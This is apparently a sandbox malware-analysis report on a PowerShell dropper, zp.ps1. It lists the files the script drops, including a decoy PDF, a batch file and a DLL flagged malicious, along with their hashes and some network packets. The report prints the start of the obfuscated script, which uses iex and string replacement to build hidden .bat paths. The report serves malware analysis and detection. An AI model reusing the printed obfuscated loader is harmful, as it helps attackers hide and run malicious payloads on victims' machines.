                                                                  SHA-512:F53CCF997C06B9318D1B83608FBCBF4E4411F6F4BCDD1C0BA8240CF90BBAD23D5997C9E256B115F8C83BB305129C34AB04AF2649BE8E96CC7EA52871F4634BD4
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):3.28772172670356
                                                                  Encrypted:false
                                                                  SSDEEP:48:7MvDom1CriomTiom2om1Nom1Aiom1RROiom1oom1pom11ZiomVsiomgqqQlmFTIS:7hrgOhxCsqN49IVXEBodRBkD
                                                                  MD5:56F60F4D4AE4BE86E1DC47BFFCCD6F0A
                                                                  SHA1:27052EF13089BCCE23351F0157C66F93BF0ED4B0
                                                                  SHA-256:0EA8563F3BDD7B70074C972B6719107509E00F0E0A7ACE314B48A32D7769EBBA
                                                                  SHA-512:C7A7ECD96C184980855863A3BC27592644C1A4E721DAB74531E8A403B274F3EDC481BC6C486C40E3DCCD1B7C03DF551FCD187508CED72E2E5A22C4457C00B376
                                                                  Malicious:false
                                                                  Preview:.... .c......Y>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s........L.s.y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):63598
                                                                  Entropy (8bit):5.433041226997456
                                                                  Encrypted:false
                                                                  SSDEEP:768:PCbGNFYGpiyVFiCUZ0rrHiTceUM3s+nqXri9j/0akN4Yyu:J0GpiyVFiB0rrHiTylQ/07N4K
                                                                  MD5:AB13CE7D51E643381B38E93A23B05B4E
                                                                  SHA1:6D33898B882228E624168FB56F6C56370C5FAA98
                                                                  SHA-256:5C1AFC4C49316FD742C407D9EA95DB69013646177814547525BF206929D2F977
                                                                  SHA-512:F34639D381AC343D5BE9EE99A441A056A87803C88C1C29CBD887A927DD0056AF6BA6E732B4DFE0C41B261C56CB95348B5CCBF049BFB82818699679366C64FD3B
                                                                  Malicious:false
                                                                  Preview:4.382.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.107.FID.2:o:........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.103.FID.2:o:........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.116.FID.2:o:........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.98.FID.2:o:........:F:Arial-B

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):11606
                                                                  Entropy (8bit):4.883977562702998
                                                                  Encrypted:false
                                                                  SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                  MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                  SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                  SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                  SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.9260988789684415
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                  Malicious:false
                                                                  Preview:@...e................................................@..........

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44kl3ld2.v02.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvamyowt.xkc.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\nsa1C4D.tmp

                                                                  Download File
                                                                  Process:C:\Users\Public\iqb3.bat
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):195216
                                                                  Entropy (8bit):6.971960422491572
                                                                  Encrypted:false
                                                                  SSDEEP:3072:PDOFOgWbK0ErSUsHBVVkQ63SaafssNkJsdCZ3reRbZ4CsosX8iA1vkDi14qbzJRC:PDt9xUsBkQ6CaGiJzFrehOCoX8Dwi14L
                                                                  MD5:51804F0D6ECD3B9DC371282708B0DBBE
                                                                  SHA1:CD2372D9DABC090AB587DA3D0F0472711FF1FC67
                                                                  SHA-256:531ED696C0C53FDD52EBCF316A75655F3ECDDA45D74281D21F6498AC339E3219
                                                                  SHA-512:64ED0F0ACFCA4A5063653085F49DE6D642042EFFA5B03E1A4FB4486A7C1C20F73C7BF93B522CB75629B7C850B62E79926EA0CA7081697710389F70945CDDC0F4
                                                                  Malicious:false
                                                                  Preview:........,...................n...........1...................................J...]...........................................................................................................................................................................................................g...x...........U...j...............................................................................................................................D...........8...'.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dll

                                                                  Download File
                                                                  Process:C:\Users\Public\iqb3.bat
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):11264
                                                                  Entropy (8bit):5.757895701334371
                                                                  Encrypted:false
                                                                  SSDEEP:192:aVL7iZJX76BisO7+UZEw+Rl59pV8ghsVJ39dx8T:d7NsOpZsfLMJ39e
                                                                  MD5:A436DB0C473A087EB61FF5C53C34BA27
                                                                  SHA1:65EA67E424E75F5065132B539C8B2EDA88AA0506
                                                                  SHA-256:75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
                                                                  SHA-512:908F46A855480AF6EACB2FB64DE0E60B1E04BBB10B23992E2CF38A4CBEBDCD7D3928C4C022D7AD9F7479265A8F426B93EEF580AFEC95570E654C360D62F5E08D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: 36819.exe.doc, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: od2DVGA5N3.exe, Detection: malicious, Browse
                                                                  • Filename: od2DVGA5N3.exe, Detection: malicious, Browse
                                                                  • Filename: Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exe, Detection: malicious, Browse
                                                                  • Filename: Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: rZiraatBankasiSwiftMesaji_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: rZiraatBankasiSwiftMesaji_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: dekont.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: dekont.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                  • Filename: SPL9015280.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...z.oS...........!................$'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...o........................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..F....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6208
                                                                  Entropy (8bit):3.7699144672467306
                                                                  Encrypted:false
                                                                  SSDEEP:48:QJ4AQzWY/91nyd3CecUHu8P9BXukvhkvklCywyy5fKYToJ38AzSogZoiS5fKYTos:y5yVPyJCe9NP9EkvhkvCCtDOMHIOMHH
                                                                  MD5:4E4D66016E379F4B3AACC232CE62D205
                                                                  SHA1:E34BCC5B322C134FD564BA7EC5CAA27BEE67A064
                                                                  SHA-256:7F449EEFF6EB4ED254B629AD7C88050287D74587C1A14403EEA0BF260CC549C9
                                                                  SHA-512:D2575D2F03589F3F84FBD4E7823F3AB98261C663644502088430319807677E6DF446ABA1C832F09C38DF38DEE6A284F1E9D7EA5276C29B4C38DDB39F083E2FE5
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...'+k.!-...V...a..\.................................:..DG..Yr?.D..U..k0.&...&........d.!-..y8.o....k.A........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...V......Y.....................t..A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...V......Y....................D...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......N...V......Y....................{]o.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......N...V......Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...V......Y..............D.....G`..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P%v..Programs..j.......N...V......Y..............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N...U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...Px......Y..........

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J79LIQGZ3F74PE614BNG.temp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6208
                                                                  Entropy (8bit):3.7699144672467306
                                                                  Encrypted:false
                                                                  SSDEEP:48:QJ4AQzWY/91nyd3CecUHu8P9BXukvhkvklCywyy5fKYToJ38AzSogZoiS5fKYTos:y5yVPyJCe9NP9EkvhkvCCtDOMHIOMHH
                                                                  MD5:4E4D66016E379F4B3AACC232CE62D205
                                                                  SHA1:E34BCC5B322C134FD564BA7EC5CAA27BEE67A064
                                                                  SHA-256:7F449EEFF6EB4ED254B629AD7C88050287D74587C1A14403EEA0BF260CC549C9
                                                                  SHA-512:D2575D2F03589F3F84FBD4E7823F3AB98261C663644502088430319807677E6DF446ABA1C832F09C38DF38DEE6A284F1E9D7EA5276C29B4C38DDB39F083E2FE5
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...'+k.!-...V...a..\.................................:..DG..Yr?.D..U..k0.&...&........d.!-..y8.o....k.A........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...V......Y.....................t..A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...V......Y....................D...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......N...V......Y....................{]o.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......N...V......Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...V......Y..............D.....G`..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P%v..Programs..j.......N...V......Y..............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N...U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...Px......Y..........

                                                                  C:\Users\user\Desktop\List of required items and services.pdf

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):653248
                                                                  Entropy (8bit):7.983402816932296
                                                                  Encrypted:false
                                                                  SSDEEP:12288:Z5j8QLfikr2uyiCDVvzDFgONPYpKE7nmP4II3xHjK4HTbuSGxEw6:H8QbZ2upCDtuOQKE7nmA3xWYT6LT6
                                                                  MD5:9B05142184F080AE36983D0A25597143
                                                                  SHA1:6421CD63995163132E89709FF70D695825A3CBDC
                                                                  SHA-256:F16B7347BCAADA09E4A85E92A704CCC67F413DDBA62BBDF4BBE14A7B687AC455
                                                                  SHA-512:EBDB6D9682A0DAC526214D9E5173E0CF627D1E538F2A728768E913FD2CE94B926DA6A248DFB5AE6D1DFAF0CE33807D3007D05785BE200687C55B926DCE6908DC
                                                                  Malicious:false
                                                                  Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                  C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses\Tolerantly.Ipo

                                                                  Download File
                                                                  Process:C:\Users\Public\iqb3.bat
                                                                  File Type:ASCII text, with very long lines (53268), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):53268
                                                                  Entropy (8bit):2.684317642932276
                                                                  Encrypted:false
                                                                  SSDEEP:768:dVxwKHzlY+1eXGEKGW4c0YzQnrAUgkrCSiQkj12qDxToZLL23FEEEc5c/4jUYifk:DTPG8POJ8xUZXIdjUJJmyvPfq
                                                                  MD5:96316B84E79ECE7FEDDB9C47B2995DBB
                                                                  SHA1:5ED39E6FCAE0FF2ABEE3180806F7C2B47ED2F6B4
                                                                  SHA-256:7418720923F5512313D1D62E125F0359630FB385A83396C534E16EBC6A3906D5
                                                                  SHA-512:7B2EAA702F4ABE6885D17AE3459FEA48C7EB7A0EB2DEE2BC1BC29A78A906A88880C52FFE6AC98AF1FA6E6D3181FFF95E13BD0340ACCAE97D9EE9BC41607E793C
                                                                  Malicious:false
                                                                  Preview:0000000000000000001E00B7B7B7003A00626262000000004A0000380000060000000000BFBF000909004D4D4D4D0000DCDC0000EC000000A2A2A2A2A20000B3B3003D008C8C8C000000CFCF00F3F3000000000000009F007A00B2B2000000AFAFAF00070700A6000090000900000000640000ADAD007A7A7A7A7A002900006F6F6F0000004B4B00A7005C00000085000E0E00434343000000A7000000005A000037001F002F2F2F2F2F0000FFFF0000004A4A000000656500A2009100A4A4A4005D000C0C0C00007B0000000000AD00007A7A7A004D00060606000000858500170000DF0000CC0000000000DC000000000000505000009D9D00190000888800ACACAC00BF0000000000000000C4C4001800006868000006060000000087870000000000000000191919191900000067676700004E4E00FFFFFF00ACAC00A200002525000000000013007A0000585858008000000030005000790060600000004400009100007070700000B0006D0000F500000000000000F2F2000076000000E4E4007E7E7E007E7E0082001919190000C9C9000073737373730012121200003E0000002400004E0000100000CFCFCF00000096001D1D00000000000082004D4D0000000000434343000000AA00EDEDED0000007474747474000000FEFE00E9E9E9E9E9E9000000000035353500005A00000000

                                                                  C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses\text-x-generic-template.png

                                                                  Download File
                                                                  Process:C:\Users\Public\iqb3.bat
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):594
                                                                  Entropy (8bit):7.136914711734985
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7wtZKjCVdCy6Cfgod/213voYKgOKW3UnBIambK:XtoC++godO1DK5Khn+K
                                                                  MD5:B10CFE496FD2DF7F3AC90CEB92BB01A2
                                                                  SHA1:E6043D3C15DFBBCF1383250AF33B521083ED4435
                                                                  SHA-256:2674C9AD3B1DA0C1D4E2DF9388D19EA67E2031A99A9E9061E2C3A585BA2254A5
                                                                  SHA-512:330A19FB1E3628FE757A524B947FFA482744ADD5899E46DA7088097E1E2C6B0B2B73AEE5A817ED58E3059D5679B8F5FA7B592E68BB9EA4336D292D04B0085ECC
                                                                  Malicious:false
                                                                  Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtAuthor.Jakub Steiner.../....tEXtDescription.mimetypes7..d...!tEXtSource.http://jimmac.musichall.czif.^...aIDAT8...=N.1...q.]....".kPFB.. !Qs...G......HH... .A( .c.E..f....4..7oF.......c...(........jMJ....f..F...Z.6......!.Aw{..p..,&..o.pE9..w..................d.;/Cf.D..y.Ts.;..s.8.,.E..[.... M3D..X...uF....;k..).Ur0.....j^.........1...`.i...t4u.Jc.X.....*.1..m.t0l........I..\...T...TxU..5..I....h.;..(-R.Q.......|x...Z....19.x.;.K.=...\.lkk.........N_.....IEND.B`.

                                                                  C:\Users\user\Vkstcentrene\unprotuberant\Eners.Spe

                                                                  Download File
                                                                  Process:C:\Users\Public\iqb3.bat
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):123679
                                                                  Entropy (8bit):7.730320945274431
                                                                  Encrypted:false
                                                                  SSDEEP:3072:zgWbK0ErSUsHBVVkQ63SaafssNkJsdCZ3reRbZ4CsosX8iA1vkDi1z:z9xUsBkQ6CaGiJzFrehOCoX8Dwi1z
                                                                  MD5:60B35112577AC87E67225EDCA27D63AC
                                                                  SHA1:22DB32C5C56E9620080ABF0B7F6767C61D8FEA16
                                                                  SHA-256:984E5BEEBF5D3D4A7A544300255D18F5E049B67BD13A5A4FF507AFB3F9B1BB6E
                                                                  SHA-512:3F2250BC17AFF2D325F94539B71733BDFD16D6D94D851FAAE6C495FA9F066ADBE6E524C5926B2569C5DABD004EAC815C5EB5B32D164208B033C7D0E1FB8CE575
                                                                  Malicious:false
                                                                  Preview:.............TTTT....>......................SSS.................ll.............................[..../......rrr.qqq....#....9................... ..d...FF................rrrr................bb.....l..|.......................................==.....jj.............................#####..............11....f...EEE.........3..%%..............@.......7.^.nn........V..bbb..QQ.........u...RR...............N................uuu..............aa...... .................0................>>>>>........vvv.....uuu............g........].............................=...........*.....B.uuuu....EEE.ddddddddd..... ......MMMMMMMM.OO.......""..........vv...................................L..<............................777.----...............................d..b....ooooo......yyy...........qqq..ggg.-.7............\\..........G.1..,,............VVVV..............?...'......***..................22............"".......m.............---.................;.....eee.........w.....gg........].....++...JJ..d.......@..

                                                                  Static File Info

                                                                  General

                                                                  File type:ASCII text, with very long lines (820), with no line terminators
                                                                  Entropy (8bit):5.302861759696714
                                                                  TrID:
                                                                    File name:zp.ps1
                                                                    File size:820
                                                                    MD5:58eb8c4f2d5988814a59fca04c5b0edd
                                                                    SHA1:631eaba56247b369d4932a205ef7fa9da9350f3b
                                                                    SHA256:e6268aa465a623be3d90f4bebd5719954a9bfb7bdbb2fdb06607221bb548521c
                                                                    SHA512:fe0f645759148771f5ac3597527f210caa1a0981efa225f90655105a9a72d57de954a65ea1a8a69ba8e3ea1e56fabbf57459d783036330f4cdad1ea1abe48ea9
                                                                    SSDEEP:24:xainmMpGainYWIHi/LM7voOSOWAa6W9zm9pXv:/7pEdICAjo0qzipXv
                                                                    TLSH:BE01C2C912A795F3018074D630D1893F6276D60AA5D504E2E5E5461316ACA7D0FD1D2F
                                                                    File Content Preview:$flol3=iex($('[Environment]::GetEumnt'''.Replace('umn','nvironmentVariable(''public'') + ''\\e5vxlw.ba')));$flol=iex($('[Environment]::GetEumnt'''.Replace('umn','nvironmentVariable(''public'') + ''\\iqb3.ba')));function getit([string]$fz, [string]$oulv){$

                                                                    File Icon

                                                                    Icon Hash:3270d6baae77db44

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 1, 2023 12:14:19.518068075 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.518122911 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.518248081 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.542526007 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.542582035 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.623250961 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.623377085 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.627995014 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.628022909 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.628484964 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.660576105 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.697726011 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.697865963 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.697922945 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.697953939 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.697979927 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.698034048 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.698044062 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.698141098 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.728960037 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.729069948 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.729136944 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.729218006 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.729372025 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.729470015 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.760759115 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.760879040 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.760936022 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.760965109 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.760998011 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761018991 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761019945 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761042118 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761080027 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761110067 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761159897 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761255980 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761303902 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761322975 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761346102 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761360884 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761379004 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.761389017 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.761441946 CEST49693443192.168.2.684.16.234.51
                                                                    Jun 1, 2023 12:14:19.792572975 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.792663097 CEST4434969384.16.234.51192.168.2.6
                                                                    Jun 1, 2023 12:14:19.792679071 CEST49693443192.168.2.684.16.234.51
